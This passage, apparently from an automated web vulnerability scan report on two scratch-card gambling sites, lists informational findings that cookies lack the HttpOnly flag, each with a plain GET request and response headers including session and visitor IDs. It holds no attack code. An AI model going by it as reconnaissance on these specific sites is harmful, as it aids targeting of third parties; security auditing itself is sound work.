Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.331. http://www.scratch2cash.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46391


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.332. http://www.scratch2cash.com/Sitemap.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Sitemap.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.333. http://www.scratch2cash.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.334. http://www.scratch2cash.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; __utmz=1.1305546138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; BO=FM; UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; CountryCode=US; CSITemp=1; __utma=1.1546523937.1305546138.1305546138.1305548289.2; __utmc=1; __utmb=1.2.10.1305548289

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:18:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 45693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.335. http://www.scratchcardheaven.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.scratchcardheaven.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1154wovrqoflk555jcnrqhat; path=/; HttpOnly
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=A46351914A3EDB19C738924288C71FD1&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:41:48 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: UniqueVisitorID=A46351914A3EDB19C738924288C71FD1; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Vary: Accept-Encoding
Content-Length: 44431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.336. http://www.scratchcardheaven.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.337. http://www.scratchcardheaven.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52526


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.338. http://www.scratchcardheaven.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.339. http://www.scratchcardheaven.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.340. http://www.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.341. http://www.scratchcardheaven.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:29:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:29:51 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.342. http://www.scratchcardheaven.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53351


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.343. http://www.scratchcardheaven.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
